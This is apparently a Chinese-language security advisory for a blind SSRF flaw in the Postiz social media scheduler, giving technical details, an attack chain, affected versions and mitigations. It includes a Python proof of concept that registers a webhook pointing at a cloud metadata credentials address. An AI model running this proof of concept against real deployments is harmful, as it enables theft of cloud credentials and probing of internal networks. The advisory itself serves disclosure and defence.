CVE-2026-34590 CVSS 5.4 中危

CVE-2026-34590 Postiz 盲SSRF漏洞

披露日期: 2026-04-02

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-34590

漏洞类型

服务端请求伪造 (SSRF)

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Postiz

漏洞概述

Postiz是一个AI社交媒体调度工具。在2.21.4版本之前，其创建webhook的接口仅校验URL格式，未过滤内网地址。攻击者可构造恶意webhook，在发布文章时触发系统回调，从而实现对内部服务的盲SSRF攻击。

技术细节

漏洞位于`POST /webhooks/`接口，该接口使用的`WebhooksDto`仅包含`@IsUrl()`格式校验，缺失`@IsSafeWebhookUrl`验证器，无法拦截私有网络地址。虽然更新和测试接口有此防护，但创建接口没有。当文章发布时，orchestrator组件直接调用存储的webhook URL且无运行时校验，导致攻击者可探测内网服务或窃取元数据。

攻击链分析

STEP 1

身份验证

攻击者使用低权限账户登录Postiz平台。

STEP 2

创建恶意Webhook

攻击者向`POST /webhooks/`接口发送请求，将URL字段设置为内网地址（如`http://127.0.0.1`或云元数据服务地址）。

STEP 3

存储漏洞利用

由于后端仅校验URL格式而未校验安全性，恶意Webhook被成功存储到数据库中。

STEP 4

触发回调

攻击者发布或安排发布一篇文章，触发系统的orchestrator组件。

STEP 5

执行SSRF

系统向攻击者指定的内网地址发送HTTP请求，导致敏感信息泄露或由于内网端口探测。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Configuration
target_host = "http://vulnerable-postiz-instance.com"
attacker_controlled_url = "http://169.254.169.254/latest/meta-data/iam/security-credentials/"
login_token = "<USER_ACCESS_TOKEN>"

# Step 1: Create a malicious webhook
create_webhook_url = f"{target_host}/api/webhooks"
headers = {
    "Authorization": f"Bearer {login_token}",
    "Content-Type": "application/json"
}
payload = {
    "url": attacker_controlled_url, # Internal IP address
    "event": "post.published",
    "provider": "custom"
}

response = requests.post(create_webhook_url, json=payload, headers=headers)

if response.status_code == 201:
    print("[+] Malicious webhook created successfully.")
    print("[*] Wait for a post to be published to trigger the SSRF.")
else:
    print("[-] Failed to create webhook.")
    print(response.text)

影响范围

Postiz < 2.21.4

防御指南

临时缓解措施

在升级修复前，建议通过WAF（Web应用防火墙）规则拦截包含内网IP段（如127.0.0.1, 192.168.x.x, 10.x.x.x, 172.16-31.x.x）的Webhook创建请求，或者临时禁用Webhook功能以阻断攻击路径。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表